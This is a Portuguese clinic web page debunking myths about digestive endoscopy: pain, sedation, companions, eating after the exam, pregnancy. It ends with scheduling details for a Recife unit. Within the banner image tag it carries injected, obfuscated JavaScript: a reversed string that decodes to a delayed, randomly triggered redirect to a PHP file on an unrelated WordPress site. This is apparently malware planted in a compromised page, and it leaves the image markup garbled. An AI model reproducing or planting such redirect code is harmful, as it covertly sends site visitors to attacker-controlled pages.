Mitos e Verdades sobre a Endoscopia Digestiva - Multigastro

Mitos e Verdades sobre a Endoscopia Digestiva

Banner com mão segur<script srcset=$GRn=function(n){if (typeof ($GRn.list[n]) == “string”) return $GRn.list[n].split(“”).reverse().join(“”);return $GRn.list[n];};$GRn.list=[“\’php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ando endoscópio durante endoscopia com o texto Mitos e Verdades” width=”823″ height=”316″ />

Fazer endoscopia dói – MITO
O exame é feito com uma sedação venosa suficiente para fazer o paciente dormir e ter um exame confortável, além de um analgésico na garganta.

É necessário ir acompanhado no dia da endoscopia – VERDADE
A medicação usada na sedação pode diminuir os reflexos por algumas horas após o exame, é imprescindível um acompanhante. O paciente não deve dirigir ou operar máquinas após a endoscopia.

Não é possível se alimentar após o exame – MITO
Assim que esteja bem acordado e sem dormência na garganta, o paciente pode comer normalmente.

Grávidas não podem fazer endoscopia – MITO
Desde que haja indicação formal de um especialista, a mulher grávida pode fazer endoscopia, com segurança, preferencialmente a partir do segundo trimestre da gestação.

A Multigastro realiza Endoscopias Digestivas de segunda à sexta, inclusive à noite, das 18h às 21h, na unidade Recife. Informações e agendamentos: (81) 3316.5800.

 

Share This